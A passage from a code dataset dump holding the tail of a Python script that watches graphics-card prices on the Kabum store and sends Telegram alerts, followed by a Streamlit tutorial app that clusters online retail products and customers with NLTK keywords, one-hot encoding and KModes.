False\n\t\n\tif check5700(data) and checkPrice5700(data):\n\t\t\n\t\tcont += 1\n\t\t\n\t\tif not itensKabum[data['codigo']][notificacao]:\n\t\t\t\n\t\t\talertSent = telegramSendAlert(data['link_descricao'])\n\t\t\n\t\telse:\n\t\t\tprint('Já notifiquei esta placa.')\n\t\t\n\t\tif(alertSent):\n\t\t\t\n\t\t\titensKabum[data['codigo']][notificacao] = alertSent\n\t\t\tprint('RX 5700 Notificada.')\n\t\t\t\n\tif check5600(data) and checkPrice5600(data):\n\t\t\n\t\tcont += 1\n\t\t\n\t\tif not itensKabum[data['codigo']][notificacao]:\n\t\t\t\n\t\t\talertSent = telegramSendAlert(data['link_descricao'])\n\t\t\n\t\telse:\n\t\t\tprint('Já notifiquei esta placa.')\n\t\t\n\t\tif(alertSent):\n\t\t\t\n\t\t\titensKabum[data['codigo']][notificacao] = alertSent\n\t\t\tprint('RX 5600 Notificada.')\n\t\n\tif check5500(data) and checkPrice5500(data):\n\t\t\n\t\tcont += 1\n\t\t\n\t\tif not itensKabum[data['codigo']][notificacao]:\n\t\t\t\n\t\t\talertSent = telegramSendAlert(data['link_descricao'])\n\t\t\n\t\telse:\n\t\t\tprint('Já notifiquei esta placa.')\n\t\t\n\t\tif(alertSent):\n\t\t\t\n\t\t\titensKabum[data['codigo']][notificacao] = alertSent\n\t\t\tprint('RX 5500 Notificada.')\n\ndef checkNividia(data, cont, itensKabum):\n\t\n\talertSent = False\n\t\n\tif check3090(data) and checkPrice3090(data):\n\t\t\n\t\tcont += 1\n\t\t\n\t\tif not itensKabum[data['codigo']][notificacao]:\n\t\t\t\n\t\t\talertSent = telegramSendAlert(data['link_descricao'])\n\t\t\n\t\telse:\n\t\t\tprint('Já notifiquei esta placa.')\n\t\t\n\t\tif(alertSent):\n\t\t\t\n\t\t\titensKabum[data['codigo']][notificacao] = alertSent\n\t\t\tprint('3090 Notificada.')\n\n\tif check3080(data) and checkPrice3080(data):\n\t\t\n\t\tcont += 1\n\t\t\n\t\tif not itensKabum[data['codigo']][notificacao]:\n\t\t\t\n\t\t\talertSent = telegramSendAlert(data['link_descricao'])\n\t\t\n\t\telse:\n\t\t\tprint('Já notifiquei esta placa.')\n\t\t\n\t\tif(alertSent):\n\t\t\t\n\t\t\titensKabum[data['codigo']][notificacao] = alertSent\n\t\t\tprint('3080 Notificada.')\n\n\tif check3070(data) and checkPrice3070(data):\n\t\t\n\t\tcont += 1\n\t\t\n\t\tif not itensKabum[data['codigo']][notificacao]:\n\t\t\t\n\t\t\talertSent = telegramSendAlert(data['link_descricao'])\n\t\t\n\t\telse:\n\t\t\tprint('Já notifiquei esta placa.')\n\t\t\n\t\tif(alertSent):\n\t\t\t\n\t\t\titensKabum[data['codigo']][notificacao] = alertSent\n\t\t\tprint('3070 Notificada.')\n\n\tif check3060Ti(data) and checkPrice3060Ti(data):\n\t\t\n\t\tcont += 1\n\t\t\n\t\tif not itensKabum[data['codigo']][notificacao]:\n\t\t\t\n\t\t\talertSent = telegramSendAlert(data['link_descricao'])\n\t\t\n\t\telse:\n\t\t\tprint('Já notifiquei esta placa.')\n\t\t\n\t\tif(alertSent):\n\t\t\t\n\t\t\titensKabum[data['codigo']][notificacao] = alertSent\n\t\t\tprint('3060 ti Notificada.')\n\n\tif check2060(data) and checkPrice2060(data):\n\t\t\n\t\tcont += 1\n\t\t\n\t\tif not itensKabum[data['codigo']][notificacao]:\n\t\t\t\n\t\t\talertSent = telegramSendAlert(data['link_descricao'])\n\t\t\n\t\telse:\n\t\t\tprint('Já notifiquei esta placa.')\n\t\t\n\t\tif(alertSent):\n\t\t\t\n\t\t\titensKabum[data['codigo']][notificacao] = alertSent\n\t\t\tprint('2060 Notificada.')\n\n\tif check1660Super(data) and checkPrice1660Super(data):\n\t\t\n\t\tcont += 1\n\t\t\n\t\tif not itensKabum[data['codigo']][notificacao]:\n\t\t\t\n\t\t\talertSent = telegramSendAlert(data['link_descricao'])\n\t\t\n\t\telse:\n\t\t\tprint('Já notifiquei esta placa.')\n\t\t\n\t\tif(alertSent):\n\t\t\t\n\t\t\titensKabum[data['codigo']][notificacao] = alertSent\n\t\t\tprint('1660 Super Notificada.')\n\ndef checkState(dado, itensKabum):\n\t\n\t\n\tif dado['disponibilidade'] != itensKabum[dado['codigo']][disponibilidade]:\n\t\t\n\t\titensKabum[dado['codigo']][disponibilidade] = dado['disponibilidade']\n\t\titensKabum[dado['codigo']][notificacao] = False\n\t\t\n\t\tprint(f\"Disponibilidade do Produto {dado['codigo']} Alterado para: {dado['disponibilidade']}\")\n\ndef telegramSendAlert(urlProduto):\n\t\n\t# criando a mensagem\n\tmessage = 'https://www.kabum.com.br' + urlProduto\n\t\n\t# inicializando variáveis do bot bot\n\t\n\t\n\t# protótipo de mensagem\n\t# message = \"https://www.kabum.com.br/produto/129973/placa-de-v-deo-asus-nvidia-geforce-gtx-1650-4gb-gddr6-tuf-gtx1650-o4gd6-p-gaming\"\n\t\n\t# url para envio da mensagem\n\turl = \"https://api.telegram.org/bot{}/sendMessage?chat_id={}&text={}\".format(token,chatId,message)\n\tsession = HTMLSession()\n\t\n\ttries = 0\n\twhile tries < 3:\n\t\ttry:\n\n\t\t\tresponse = session.get(url, timeout=1)\n\n\t\texcept Exception as e:\n\n\t\t\t\tprint(f'Error: {e}')\n\t\t\t\ttries += 1\n\n\t\telse:\n\t\t\treturn True\n\t","repo_name":"CaioMM/checkPriceKaBuM","sub_path":"checkLib.py","file_name":"checkLib.py","file_ext":"py","file_size_in_byte":8878,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"24714758852","text":"import pandas as pd\nimport streamlit as st\nimport numpy as np\nimport streamlit as st\nimport pandas as pd\nimport streamlit.components.v1 as components\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nimport seaborn as sns\nimport datetime, nltk, warnings\nimport itertools\nfrom pathlib import Path\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\nfrom sklearn.cluster import KMeans\nfrom sklearn.metrics import silhouette_samples, silhouette_score\nfrom sklearn import preprocessing, model_selection, metrics, feature_selection\nfrom sklearn.model_selection import GridSearchCV, learning_curve, KFold\nfrom sklearn.svm import SVC, LinearSVC\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn import neighbors, linear_model, svm, tree, ensemble\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.model_selection import cross_validate \nfrom sklearn.neural_network import MLPClassifier\nfrom kmodes.kmodes import KModes\nfrom sklearn.metrics import silhouette_samples, silhouette_score\nfrom IPython.display import display, HTML\nfrom sklearn import preprocessing, model_selection, metrics, feature_selection\nfrom sklearn.cluster import KMeans\nimport pickle\nimport plotly.graph_objs as go\nfrom plotly.offline import init_notebook_mode,iplot\nimport os\nwarnings.filterwarnings(\"ignore\")\nplt.rcParams[\"patch.force_edgecolor\"] = True\nplt.style.use('fivethirtyeight')\nmpl.rc('patch', edgecolor = 'dimgray', linewidth=1)\n\ndef get_data():\n dir_path = os.path.dirname(os.path.realpath(__file__))\n url = str(dir_path) + \"/data/data_cleaned.csv\"\n return pd.read_csv(url, encoding=\"ISO-8859-1\")\n\ndef return_list_of_products(count_keywords, keywords_select):\n list_product_keywords = []\n for k,v in count_keywords.items():\n word = keywords_select[k]\n if word in ['pink', 'blue', 'tag', 'green', 'orange']: continue\n if len(word) < 3 or v < 15: continue\n if ('+' in word) or ('/' in word): continue\n list_product_keywords.append([word, v])\n return list_product_keywords\n\ndef app():\n st.title(\"Data Preparation: Feature Engineering\")\n\n ########### DATA PREPARATION: FEATURE ENGINEERING #################\n def get_data_cleaned():\n dir_path = os.path.dirname(os.path.realpath(__file__))\n url = str(dir_path) + \"/data/data_cleaned_2.csv\"\n return pd.read_csv(url, encoding=\"ISO-8859-1\", dtype={'CustomerID': str, 'InvoiceNo': str})\n\n df_cleaned = get_data_cleaned()\n\n st.title(\"Data Preparation: Feature Engineering\")\n\n st.markdown(\"\"\"\n ### Data Preparation section consits of some steps that include:\n * Data Transformation\n * Feature Engineering\n\n ### In this Page we will create the following categories:\n 1. Product Categories\n 2. Customer Categories\n \"\"\")\n\n st.dataframe(df_cleaned.describe())\n\n st.write(\"\"\"\n Lets create a dataframe CartPrice which will contain the data for each transaction (group by invoice number)\n \"\"\")\n \n temp = df_cleaned.groupby(by=['CustomerID', 'InvoiceNo'], as_index=False)['TotalPrice'].sum()\n cart_price = temp.rename(columns = {'TotalPrice':'Cart Price'})\n\n st.code(\"\"\"\n temp_df = df_cleaned.groupby(by=['CustomerID', 'InvoiceNo'], as_index=False)['TotalPrice'].sum()\n cart_price = temp_df.rename(columns = {'TotalPrice':'Cart Price'})\n cart_price\n \"\"\")\n\n st.dataframe(cart_price)\n\n st.markdown(\"\"\"\n #### Add the date to the CartPrice DataFrame\n \"\"\")\n\n # with the code bellow we extract the date from the original df_cleaned, then we convert it to int and then assign it to the cart_price by reconstructing it to date\n df_cleaned['InvoiceDate_int'] = df_cleaned['InvoiceDate'].astype(np.datetime64).astype(np.int64)\n temp_df_2 = df_cleaned.groupby(by=['CustomerID', 'InvoiceNo'], as_index=False)['InvoiceDate_int'].mean()\n df_cleaned.drop('InvoiceDate_int', axis = 1, inplace = True) #now drop it because we dont actually need it\n cart_price.loc[:, 'InvoiceDate'] = pd.to_datetime(temp_df_2['InvoiceDate_int']) #set the value of date int to date time for the entire column\n st.dataframe(cart_price)\n\n st.markdown(\"\"\"\n #### Now lets utilize CartPrice Dataframe for visualizations\n * We have to create a barchart by grouping transactions to bins (lets say of 10 bins).\n * We exclude the transactions that costs more than 5000 Pounds because as we can see bellow they are very few\n \"\"\")\n\n # We can see tha the portion of transactions bigger than >5000 is very low (0.5%)\n cart_price_bigger5000 = cart_price[cart_price['Cart Price'] > 5000] \n perc = len(cart_price_bigger5000) / len(cart_price)\n st.markdown(\"Percentage of CartPrice values bigger than 5000 Pounds are: `{}`\".format(perc))\n\n # lets see the max and the minimum\n max = cart_price['Cart Price'].max()\n min = cart_price['Cart Price'].min()\n step = 5000/10\n\n bin_range = np.arange(0, 5000+step, step)\n out, bins = pd.cut(cart_price['Cart Price'], bins=bin_range, include_lowest=True, right=False, retbins=True)\n st.bar_chart(data=out.value_counts(sort=False), width=300, height=400)\n\n # Lets plot a barchart\n\n price_range = [0, 50, 100, 200, 500, 1000, 5000, 50000]\n count_price = []\n for i, price in enumerate(price_range):\n if i == 0: continue\n val = cart_price[(cart_price['Cart Price'] < price) &\n (cart_price['Cart Price'] > price_range[i-1])]['Cart Price'].count()\n count_price.append(val)\n\n plt.rc('font', weight='bold')\n f, ax = plt.subplots(figsize=(11, 6))\n colors = ['yellow', 'red', 'blue', 'green', 'magenta', 'cyan','black']\n labels = [ '{} < {}'.format(price_range[i-1], s) for i,s in enumerate(price_range) if i != 0]\n sizes = count_price\n explode = [0.0 if sizes[i] < 100 else 0.0 for i in range(len(sizes))]\n ax.pie(sizes, explode = explode, labels=labels, colors = colors,\n autopct = lambda x:'{:1.0f}%'.format(x) if x > 1 else '',\n shadow = False, startangle=0)\n ax.axis('equal')\n f.text(0.5, 1.01, \"Distribution of Orders\", ha='center', fontsize = 18)\n\n st.pyplot(fig=f)\n\n st.markdown(\"\"\"\n **From the Charts above we can see:**\n * The majority of CartPrice values are between 0-500 Pounds\n * There are a lot less CartPrice values above 500\n \"\"\")\n\n st.markdown(\"\"\"\n # Understand Products: Create Product Categories\n **What do we already know about the products?**\n * Each product has a unique stockcode\n * Each product has a description which describes each product\n\n **We will use basic NLP and bag of words to create a DataFrame based on the one_hot_encoding and create cluster of products**\n\n What does the dataset tell us of its products?\n What we are going to do is to explore the content of the column Description in order to group the products into different categories\n This is going to be very excited and tricky. \n - We will use one hot representation to create the `word_X_matrix` which sill contain for each description the one hot representation using bag of words technique.\n - we are going to understand what this does and what its purpose is for our object of understanding the `Description` column.\n \"\"\")\n\n is_noun = lambda pos: pos[:2] == 'NN'\n\n def bags_of_keywords(dataframe, column = 'Description'):\n nltk.download('punkt')\n nltk.download('averaged_perceptron_tagger')\n stemmer = nltk.stem.SnowballStemmer(\"english\")\n keywords_roots = dict() # collect the roots of words\n keywords_select = dict() # associates the root and keyword\n count_keywords = dict()\n category_keys = []\n \n icount = 0\n for s in dataframe[column]:\n if pd.isnull(s): continue\n lines = s.lower()\n tokenized = nltk.word_tokenize(lines)\n nouns = [word for (word, pos) in nltk.pos_tag(tokenized) if is_noun(pos)] \n \n for t in nouns:\n t = t.lower() ; root = stemmer.stem(t)\n if root in keywords_roots: \n keywords_roots[root].add(t)\n count_keywords[root] += 1 \n else:\n keywords_roots[root] = {t}\n count_keywords[root] = 1\n \n for s in keywords_roots.keys():\n if len(keywords_roots[s]) > 1: \n min_length = 1000\n for k in keywords_roots[s]:\n if len(k) < min_length:\n category_key = k ; min_length = len(k) \n category_keys.append(category_key)\n keywords_select[s] = category_key\n else:\n category_keys.append(list(keywords_roots[s])[0])\n keywords_select[s] = list(keywords_roots[s])[0]\n \n print(\"Number of keywords in variable '{}': {}\".format(column, len(category_keys)))\n return category_keys, keywords_roots, keywords_select, count_keywords\n\n\n st.markdown(\"\"\"\n Now we will create a new DF object in which we will have the unique values from the column Description and these values are obtained by the df['Description'].unique\n \"\"\")\n\n df_products = pd.DataFrame(df_cleaned.Description.unique())\n df_products.rename(columns = {0: 'Description'}, inplace=True)\n st.write(df_products)\n\n st.write(\"Now lets get the keywords by running the `bag_of_keywords` function: \")\n st.code(\"keywords, keywords_roots, keywords_select, count_keywords = bags_of_keywords(df_products)\")\n keywords, keywords_roots, keywords_select, count_keywords = bags_of_keywords(df_products)\n\n st.markdown(\"\"\"\"\n\n Great! We now have 1473 keywords. Our function returned the next:\n * keywords: The list of extracted keywords.\n * keywords_roots: A dictionary where its keys are the keywords roots and the values are the lists of words associated with these roots.\n * keywords_select: A dictionary that has the keywords that where selected for categories.\n * count_keywords: A dictionary with the numbers of times every word has been used.\n\n Now we create a list `list_keywords` and we iterate with a `for` loop the items in `count_keyword` dictionary with `k` as iterator index and `v` as object, we then append to list_products` with `[keywords_select[k], v]`, this appends the selected keywords and its values.\n \"\"\")\n\n list_keywords = []\n for k,v in count_keywords.items():\n list_keywords.append([keywords_select[k],v])\n len(list_keywords)\n st.write(list_keywords[:5])\n\n product_list = sorted(list_keywords, key = lambda x:x[1], reverse = True)\n st.dataframe(product_list)\n\n st.markdown(\"\"\"\n ####### Plot the top 50 keywords\n \"\"\")\n ## Now lets plot the product list sorted by the top 50 keywords\n plt.rc('font', weight='normal')\n\n fig, ax = plt.subplots(figsize=(10, 10))\n\n # get only the first/top num_of_words keywords\n y_axis = [i[1] for i in product_list[:50]]\n\n # get only the first/top num_of_words keywords\n x_axis = [k for k,i in enumerate(product_list[:50])]\n x_label = [i[0] for i in product_list[:50]]\n plt.yticks(x_axis, x_label)\n plt.xlabel(\"Word Frequency\")\n ax.barh(x_axis, y_axis, align = 'center', color=['black', 'red', 'green', 'blue', 'cyan', 'yellow', 'magenta'])\n ax = plt.gca()\n ax.invert_yaxis()\n st.pyplot(fig)\n\n\n st.markdown(\"\"\"\n # CREATE AND DEFINE PRODUCT CATEGORIES BASED ON THE DESCRIPTION\n \"\"\")\n st.markdown(\"\"\"\n ## Defining Product Categories\n\n The keywords list contains 1473 keywords and the most frequent ones appear in more than 200 products. \n When examinating the content of this list, we can notice that some names are useless, do not carry information. We will drop them such as stopwords, color keywords etc. \n Therefore we should discard these words from the analysis that follows and also let's consider only the words that appear more than 15 times.\n \"\"\")\n\n list_product_keywords = return_list_of_products(count_keywords=count_keywords, keywords_select=keywords_select)\n list_product_keywords.sort(key = lambda x:x[1], reverse = True)\n st.write('Number of words that were kept: `165`')\n\n st.markdown(\"\"\"\n Now we will use the onehot encoding principle: \n * Create a matrix of the unique Descriptions and put 0 and 1 where the description has a keyword or not\n \"\"\")\n list_descriptions = df_cleaned['Description'].unique()\n Word_X_matrix = pd.DataFrame()\n for key, frequency in list_product_keywords:\n # we create one column for each keyword so thats why we use the key as column\n key_UPPER = key.upper()\n list_to_append = list(map(lambda x:int(key_UPPER in x), list_descriptions))\n Word_X_matrix.loc[:, key_UPPER] = list_to_append\n\n st.dataframe(Word_X_matrix.head(5))\n\n\n st.markdown(\"\"\"\n ## Now lets add the price range to the matrix X for each description to augment the dataset: \n Shortly, we will create 5 price ranges (see the visualization of the price above `(pie chart and barchart))` to augment the dataset associated each one_hot_description with the price range\n \"\"\")\n with st.spinner('One-hot-encoding matrix creation in progress: Wait for it...'):\n threshold = [0, 1, 2, 3, 5, 10]\n label_col = []\n for i in range(len(threshold)):\n if i == len(threshold)-1:\n col = ' > {}'.format(threshold[i])\n else:\n col = '{} < {}'.format(threshold[i],threshold[i+1])\n label_col.append(col)\n Word_X_matrix.loc[:, col] = 0\n\n for i, prod in enumerate(list_descriptions):\n prix = df_cleaned[ df_cleaned['Description'] == prod]['UnitPrice'].mean()\n j = 0\n while prix > threshold[j]:\n j+=1\n if j == len(threshold): break\n Word_X_matrix.loc[i, label_col[j-1]] = 1\n\n st.write(\"{:<8} {:<20}\\n\".format('Range and', 'Count of Products in each price range'))\n\n for i in range(len(threshold)):\n if i == len(threshold)-1:\n col = ' > {}'.format(threshold[i])\n else:\n col = '{} < {}'.format(threshold[i],threshold[i+1]) \n st.write(\"{:<10} {:<20}\".format(col, Word_X_matrix.loc[:, col].sum()))\n\n st.write(\"adding the price range from 1-10 as columns to augment the dataset information (and enhance clustering)\")\n st.dataframe(Word_X_matrix.head(5))\n\n st.markdown(\"## Now we are going to use KModes to create clusters of products\")\n st.markdown(\"###### By running the code bellow we conclude to use 5 clusters for products:\")\n st.markdown(\"\"\"\n We use silhouette analysis to determine how many cluster we will use: https://scikit-learn.org/stable/auto_examples/cluster/plot_kmeans_silhouette_analysis.html\n \"\"\")\n st.code(\"\"\"\n for n_clusters in range(3,10):\n kmodes = KModes(init='Huang', max_iter=100, n_clusters=n_clusters, n_init=30, n_jobs=-1, random_state=42)\n clusters = kmodes.fit_predict(Word_X_matrix)\n silhouette_avg = silhouette_score(Word_X_matrix, clusters)\n print(\"For n_clusters =\", n_clusters, \"The average silhouette_score is :\", silhouette_avg)\n \"\"\")\n st.write(\"\"\"\n Result for n_clusters = 3 The average silhouette_score is : 0.11142050517146847\n * For n_clusters = 4 The average silhouette_score is : 0.11369426930609004\n * For n_clusters = 5 The average silhouette_score is : 0.15605111618663936\n * For n_clusters = 6 The average silhouette_score is : 0.15591614204472466\n * For n_clusters = 7 The average silhouette_score is : 0.15497509597519985\n * For n_clusters = 8 The average silhouette_score is : 0.12549958008303969\n * For n_clusters = 9 The average silhouette_score is : 0.13722223664399463\n \"\"\")\n \n st.write(\"Through the code above we conclude to use `K=5` (we dont run it because of the long runtime required)\")\n st.write(\"The code bellow will create clusters of Products utilizing the word_X_matrix we created utilizing the one-hot-encoding principle and adding the price range scaled from 1-10\")\n st.code(\"\"\"\n n_clusters = 5\n silhouette_avg = -1\n while silhouette_avg < 0.15:\n kmodes = KModes(init='Huang', max_iter=75, n_clusters=n_clusters, n_init=30, n_jobs=-1, random_state=42)\n clusters = kmodes.fit_predict(Word_X_matrix)\n silhouette_avg = silhouette_score(Word_X_matrix, clusters)\n print('For n_clusters = ', n_clusters, ' The average silhouette_score is : ', silhouette_avg)\n \"\"\")\n\n st.write(\"Clustering in progres...\")\n n_clusters = 5\n silhouette_avg = -1\n with st.spinner('Clustering in progress: Wait for it...'):\n while silhouette_avg < 0.15:\n kmodes = KModes(init='Huang', max_iter=75, n_clusters=n_clusters, n_init=30, n_jobs=-1, random_state=42)\n clusters = kmodes.fit_predict(Word_X_matrix)\n silhouette_avg = silhouette_score(Word_X_matrix, clusters)\n st.write('For n_clusters = {} The average silhouette_score is : {}'.format(n_clusters,silhouette_avg))\n\n st.markdown(\"## Now we need to evaluate the content of clusters and check the distribution\")\n\n def graph_component_silhouette(n_clusters, lim_x, mat_size, sample_silhouette_values, clusters):\n plt.rcParams[\"patch.force_edgecolor\"] = True\n plt.style.use('fivethirtyeight')\n mpl.rc('patch', edgecolor = 'dimgray', linewidth=1)\n \n fig, ax1 = plt.subplots(1, 1)\n fig.set_size_inches(8, 8)\n ax1.set_xlim([lim_x[0], lim_x[1]])\n ax1.set_ylim([0, mat_size + (n_clusters + 1) * 10])\n y_lower = 10\n for i in range(n_clusters):\n \n # Aggregate the silhouette scores for samples belonging to cluster i, and sort them\n ith_cluster_silhouette_values = sample_silhouette_values[clusters == i]\n ith_cluster_silhouette_values.sort()\n size_cluster_i = ith_cluster_silhouette_values.shape[0]\n y_upper = y_lower + size_cluster_i\n cmap = cm.get_cmap(\"Spectral\")\n color = cmap(float(i) / n_clusters) \n ax1.fill_betweenx(np.arange(y_lower, y_upper), 0, ith_cluster_silhouette_values,\n facecolor=color, edgecolor=color, alpha=0.8)\n \n # Label the silhouette plots with their cluster numbers at the middle\n ax1.text(-0.03, y_lower + 0.5 * size_cluster_i, str(i), color = 'red', fontweight = 'bold',\n bbox=dict(facecolor='white', edgecolor='black', boxstyle='round, pad=0.3'))\n \n # Compute the new y_lower for next plot\n y_lower = y_upper + 10\n\n st.pyplot(fig)\n\n sample_silhouette_values = silhouette_samples(Word_X_matrix, clusters)\n\n graph_component_silhouette(n_clusters, [-0.07, 0.35], len(Word_X_matrix), sample_silhouette_values, clusters)\n\n\n st.markdown(\"\"\"\n ## Now we have clusters of products Lets create customer categories:\n - We will create the categories for our customers, but first we need to give some proper format to some data.\n - As we already grouped our products into five different clusters we must incorporate this information into the dataframe, we are going to create a new column/feature called Product_Category and it will hold the cluster of each product.\n - We create product_category dictionary, we iterate trough zipping list_descriptions and clusters as key for descriptions from list_descriptions and val for the number of cluster from clusters, then we assign to product_category[key] the value of val.\n - product_category will have the descriptions and to what cluster they belong.\n \"\"\")\n\n product_category = dict()\n for key, val in zip (list_descriptions, clusters):\n product_category[key] = val\n\n st.markdown(\"\"\"\n We create the column Product_Category and we assign it the categories by mapping with\n df_cleaned.loc[:, 'Description'].map(product_category).\n \"\"\")\n\n df_cleaned['Product_Category'] = df_cleaned.loc[:, 'Description'].map(product_category)\n\n st.dataframe(df_cleaned.sample(5))\n\n st.markdown(\"\"\"\n We now have every transaction and its category.\n - `Grouping the Products`\n - Let's create a `Cat_N` variables (with $N$ $∈$ $[0:4]$ ) that contains the amount spent in each product category.\n \"\"\")\n\n st.markdown(\"\"\"\n Create a column in which we will have how much money each customer spent in each category.\n \"\"\")\n\n for i in range(5):\n col = 'Cat_{}'.format(i) \n df_temp = df_cleaned[df_cleaned['Product_Category'] == i]\n price_temp = df_temp['TotalPrice']\n price_temp = price_temp.apply(lambda x:x if x > 0 else 0)\n df_cleaned.loc[:, col] = price_temp\n df_cleaned[col].fillna(0, inplace = True)\n\n st.dataframe(df_cleaned.sample(5))\n\n st.markdown(\"\"\"\n Now we create a temporal DataFrame object temp, in this new temporal dataframe we are going to hold the TotalPrice sum grouped by CustomerID and InvoiceNo, then we are going to assign to cart_price the values from temp.\n \"\"\")\n st.code(\"\"\"\n temp = df_cleaned.groupby(by=['CustomerID', 'InvoiceNo'], as_index=False)['TotalPrice'].sum()\n cart_price = temp.rename(columns = {'TotalPrice':'Cart Price'})\n \"\"\")\n temp = df_cleaned.groupby(by=['CustomerID', 'InvoiceNo'], as_index=False)['TotalPrice'].sum()\n cart_price = temp.rename(columns = {'TotalPrice':'Cart Price'})\n\n st.markdown(\"\"\"\n Then we iterate in a `for` loop a range of `5` iterations with `i` as iterator index, inside this loop we first assign to the var `col` the name of the column `Cat_{i}`, then we assign to `temp` the result from grouping `CustomerID` and `InvoiceNo` and the sum of `col`, then we assign to `cart_price` in the column `col` the values in `temp`. \n \"\"\")\n\n st.code(\"\"\"\n for i in range(5):\n col = 'Cat_{}'.format(i) \n temp = df_cleaned.groupby(by=['CustomerID', 'InvoiceNo'], as_index=False)[col].sum()\n cart_price.loc[:, col] = temp\n \"\"\")\n\n for i in range(5):\n col = 'Cat_{}'.format(i) \n temp = df_cleaned.groupby(by=['CustomerID', 'InvoiceNo'], as_index=False)[col].sum()\n cart_price.loc[:, col] = temp\n\n st.dataframe(cart_price.head(5))\n\n st.markdown(\"####### Now what are we going to do is to add the dates of the transactions to the dataframe cart_price\")\n\n df_cleaned['InvoiceDate_int'] = df_cleaned['InvoiceDate'].astype(np.datetime64).astype(np.int64)\n temp = df_cleaned.groupby(by=['CustomerID', 'InvoiceNo'], as_index=False)['InvoiceDate_int'].mean()\n df_cleaned.drop('InvoiceDate_int', axis = 1, inplace = True)\n cart_price.loc[:, 'InvoiceDate'] = pd.to_datetime(temp['InvoiceDate_int'])\n\n st.markdown(\"\"\"\n Now we are going to filter in cart_price the values from the column Cart Price that are bigger than 0, then we sort its values in ascending order according to CustomerID column and display the first 5 samples in this dataframe.\n \"\"\")\n\n cart_price = cart_price[cart_price['Cart Price'] > 0]\n cart_price.sort_values('CustomerID', ascending = True).head(5)\n\n st.write(\"Oldest transactions\")\n\n st.write(\"min invoice date: {}\".format(cart_price['InvoiceDate'].min()))\n st.write(\"max invoice date: {}\".format(cart_price['InvoiceDate'].max()))\n\n st.markdown(\"\"\"\n ### Taking Care of Data Over Time\n We have to remember (see code bellow) that we have data from 1 exact year. \n * The main objectives of this notebook is to develop a model to characterizing and anticipating the habits of the customers visiting the online retail from their first visit. \n * How can we test the model in a realistic way?, We can split the dataset by keeping the first 10 months for training, development and testing of the model and do the last two months the same way in order to see if there are not any differences among the evaluations scores it means that we are good. \n * Now let's define a var date_limit which is going to work as the limit day for comparison.\n * The reasons is because we cannot train the model in the first ten months and test it with the last 2 months because we will lose seasonality. \n * Additionally we have to mention that we experiment to test with the last 2 months the model trained with the first 10 months and it was preforming very bad\n \"\"\")\n\n st.code(\"\"\"\n # Original start dataframe\n df['InvoiceDate'] = df['InvoiceDate'].astype('datetime64[ns]')\n df.InvoiceDate.max(), df.InvoiceDate.min()\n \"\"\")\n st.markdown(\"\"\"\n **Output:** (Timestamp('2011-12-09 12:50:00'), Timestamp('2010-12-01 08:26:00'))\n \"\"\")\n\n import datetime\n date_limit = np.datetime64(datetime.date(2011, 10, 1))\n date_limit\n\n st.markdown(\"\"\"\n ### As we mentioned above we will train \n train_set: data from cart_price that was registered before the date 2011-10-1 and\n test_set: data from cart_price that was registered during and after the date 2011-10-1.\n \"\"\")\n\n st.code(\"\"\"\n train_set = cart_price[cart_price['InvoiceDate'] < date_limit]\n test_set = cart_price[cart_price['InvoiceDate'] >= date_limit]\n \"\"\")\n\n train_set = cart_price[cart_price['InvoiceDate'] < date_limit]\n test_set = cart_price[cart_price['InvoiceDate'] >= date_limit]\n\n cart_price = train_set.copy(deep = True)\n\n st.write(\"Train Set DF:\")\n st.dataframe(train_set.tail(5))\n st.write(\"Test Set DF: \")\n st.dataframe(test_set.head(5))\n\n st.markdown(\"\"\"\n Then we create the DataFrame object `transactions_per_user`, in this new dataframe we assign the values of count, min, max, mean and sum from gruping by CustomerID and Cart Price. The information on transactions_per_user is just basic statistics of the values found in the Cart Price of each customer.\n \"\"\")\n\n transactions_per_user=cart_price.groupby(by=['CustomerID'])['Cart Price'].agg(['count','min','max','mean','sum'])\n st.dataframe(transactions_per_user)\n\n for i in range(5):\n col = 'Cat_{}'.format(i)\n transactions_per_user.loc[:,col] = cart_price.groupby(by=['CustomerID'])[col].sum() / transactions_per_user['sum']*100\n\n st.dataframe(transactions_per_user.head(5))\n\n st.markdown(\"\"\"\n * We group cart_price dataframe by CustomerID and sum the values from Category_0 column.\n * Therefore cart_price will have how much each customer has bought in Category_0.\n \"\"\")\n\n transactions_per_user.reset_index(drop=False, inplace=True)\n cart_price.groupby(by=['CustomerID'])['Cat_0'].sum()\n st.dataframe(transactions_per_user.sort_values('CustomerID', ascending=True).head(5))\n\n st.markdown(\"\"\"\n Lets define two additional columns for the number of days elapsed since the first purchase ( FirstPurchase ) and the number of days since the last purchase ( LastPurchase ):\n\n We take in last_date the maximun date on InvoiceDate from cart_price.\n \"\"\")\n\n last_date = cart_price['InvoiceDate'].max().date()\n st.write(\"Last date: {}\".format(last_date))\n\n st.markdown(\"\"\"\n Let's create the next dataframes `first_registration` for the first date that a customer made a transaction, this is done through grouping by CustomerID and taking the minimun date from InvoiceDate and for last_purchase dataframe we take the last date that a customer made a transaction, this is done through grouping by CustomerID and taking the maximum date from InvoiceDate.\n \"\"\")\n\n st.code(\"\"\"\n first_registration = pd.DataFrame(cart_price.groupby(by=['CustomerID'])['InvoiceDate'].min())\n last_purchase = pd.DataFrame(cart_price.groupby(by=['CustomerID'])['InvoiceDate'].max())\n \"\"\")\n\n first_registration = pd.DataFrame(cart_price.groupby(by=['CustomerID'])['InvoiceDate'].min())\n last_purchase = pd.DataFrame(cart_price.groupby(by=['CustomerID'])['InvoiceDate'].max())\n st.dataframe(first_registration.head())\n st.dataframe(last_purchase.head())\n\n st.markdown(\"\"\"\n We have seen what info do first_registration and last_purchase are holding, now we are going to calculate how many days have passed, this is done by creating two separete dataframe, one for first_registration and last_purchase.\n\n Let's create test_fp a dataframe, where we are going to apply a lambda function that calculates the days that have to first_registration with the function applymap(lambda x:(last_date - x.date()).days).\n\n Now we are going to create test_lp a dataframe, where we are going to apply a lambda function that calculates the days that have to last_purchase with the function applymap(lambda x:(last_date - x.date()).days).\n \"\"\")\n\n st.code(\"\"\"\n test_fp = first_registration.applymap(lambda x:(last_date - x.date()).days)\n test_lp = last_purchase.applymap(lambda x:(last_date - x.date()).days)\n \"\"\")\n test_fp = first_registration.applymap(lambda x:(last_date - 